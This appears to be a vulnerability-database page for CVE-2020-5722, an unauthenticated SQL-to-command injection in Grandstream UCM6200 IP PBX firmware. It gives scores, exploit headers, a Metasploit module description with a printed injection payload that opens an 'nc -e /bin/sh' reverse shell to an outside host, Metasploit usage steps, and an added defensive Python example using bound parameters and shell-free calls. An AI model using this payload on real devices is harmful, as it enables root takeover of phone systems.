CVE-2020-5722

Published: 23/03/2020 Updated: 10/02/2022
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via a crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions prior to 1.0.19.20 or inject HTML in password recovery emails in versions prior to 1.0.20.17.

Vulnerable Product

grandstream ucm6200_firmware

Exploits

# Exploit Title: UCM6202 1.0.18.13 - Remote Command Injection
# Date: 2020-03-23
# Exploit Author: Jacob Baines
# Vendor: www.grandstream.com
# Product Link: www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series
# Tested on: UCM6202 1.0.18.13
# CVE : CVE-2020-5722
# Shodan Dork: ssl:"Grandstream" "Set-Cookie: ...

This Metasploit module exploits an unauthenticated SQL injection vulnerability and a command injection vulnerability affecting the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an unauthenticated remote attacker to execute commands as root ...

UCM6202 version 1.0.18.13 suffers from a remote command injection vulnerability ...

This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an unauthenticat ...

Metasploit Modules

Grandstream UCM62xx IP PBX sendPasswordEmail RCE

This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an unauthenticated remote attacker to execute commands as root.

Exploitation happens in two stages:

1. An SQL injection during username lookup while executing the "Forgot Password" function.
2. A command injection that occurs after the user-provided username is passed to a Python script via the shell. Like so:

    /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
    password '' `cat <<'TTsf7G0'
    z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;`
    TTsf7G0
    `

This module affects UCM62xx versions before firmware version 1.0.19.20.
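Both stages above come down to request input being spliced into an interpreter's text: first a SQL statement, then a shell command line. The following is an added example, not code from the Metasploit module or from Grandstream's firmware; it contrasts the concatenated lookup with a bound parameter and invokes the mailer without a shell. The table schema, the username allowlist and the echoing child process that stands in for sendMail.py are assumptions.

```python
import re
import sqlite3
import subprocess
import sys

def make_db():
    # Constructed stand-in for the device's user table (schema is assumed).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_name TEXT, email TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'admin@example.test')")
    return db

# Assumed allowlist policy for account names.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

def lookup_email_unsafe(db, user_name):
    # Stage 1 as described: the input becomes part of the SQL text.
    sql = "SELECT email FROM users WHERE user_name = '" + user_name + "'"
    return db.execute(sql).fetchall()

def lookup_email(db, user_name):
    # Bound parameter: the input is only ever compared as data.
    sql = "SELECT email FROM users WHERE user_name = ?"
    return db.execute(sql, (user_name,)).fetchall()

def run_mailer(user_name):
    # Stage 2 hardened: an argv list with no /bin/sh in between, so
    # backticks, ';' and heredoc markers reach the child as literal bytes.
    # The child is a stand-in for sendMail.py that echoes its argument.
    child = [sys.executable, "-c",
             "import sys; sys.stdout.write(sys.argv[1])", user_name]
    done = subprocess.run(child, capture_output=True, text=True, check=True)
    return done.stdout

def send_password_email(db, user_name):
    # Reject malformed names before they reach SQL or a process boundary.
    if not USERNAME_RE.fullmatch(user_name):
        return None
    if len(lookup_email(db, user_name)) != 1:
        return None
    return run_mailer(user_name)
```
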

msf > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
msf exploit(grandstream_ucm62xx_sendemail_rce) > show targets
    ...targets...
msf exploit(grandstream_ucm62xx_sendemail_rce) > set TARGET <target-id>
msf exploit(grandstream_ucm62xx_sendemail_rce) > show options
    ...show and set options...
msf exploit(grandstream_ucm62xx_sendemail_rce) > exploit